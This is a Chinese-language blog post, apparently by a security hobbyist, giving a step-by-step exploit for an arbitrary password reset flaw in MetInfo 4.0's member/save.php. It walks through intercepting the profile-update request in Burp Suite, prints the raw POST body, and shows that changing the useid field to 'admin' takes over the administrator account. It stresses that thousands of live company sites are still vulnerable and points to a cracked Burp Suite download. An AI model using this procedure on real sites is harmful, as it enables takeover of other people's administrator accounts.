MetInfo4.0任意用户密码修改（包括管理员）漏洞――小残

简要描述：

MetInfo4.0注册会员后，可以修改任意用户和管理员密码，影响巨大

百度或者谷歌里可以找到上千用MetInfo4.0的企业站，危害特别严重！

 

详细说明：

百度搜索随便就一大堆，此前没有看到过这个版本的漏洞导致很多人还在继续用4.0版本

漏洞页面:member/save.php  注册页面:/member/  默认后台:/admin

先注册一个用户然后登录后点击修改基本资料

填写好修改的密码后打开抓包工具进行抓包这里我使用Burp Suite

如果没有的朋友可以去博客前面的文章下载《渗透测试神器Burp Suite v1.6.17破解版下载》

先用火狐设置下http代理  IP为本地:127.0.0.1 端口要和Burp Suite的端口一样 都是8080

默认的Burp Suite监听端口都是8080的

设置好后点击添加信息即可看到如下内容

Cookie: PHPSESSID=004c459b13c11bcf58a388a87942abfbContent-Type: application/x-www-form-urlencodedContent-Length: 296useid=caonima&lang=cn&pass1=123456.&pass2=123456.&realname=&sex=1&tel=&mobile=&email=123456%40qq.com&qq=&msn=&taobao=&admin_introduction=&companyname=%E8%8D%89%E6%B3%A5%E9%A9%AC%E5%85%AC%E5%8F%B8&companyfax=&companycode=&companyaddress=&companywebsite=&Submit=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF

现在要做的就是修改包的内容 将

useid=caonima //修改成管理员的用户名admin 然后把包放出去即可修改成功。！

点击intercept is on 即可！发送出去 ,如果在网页中提示如下即修改密码成功

修改就可以使用刚才修改的密码登录admin管理员帐号了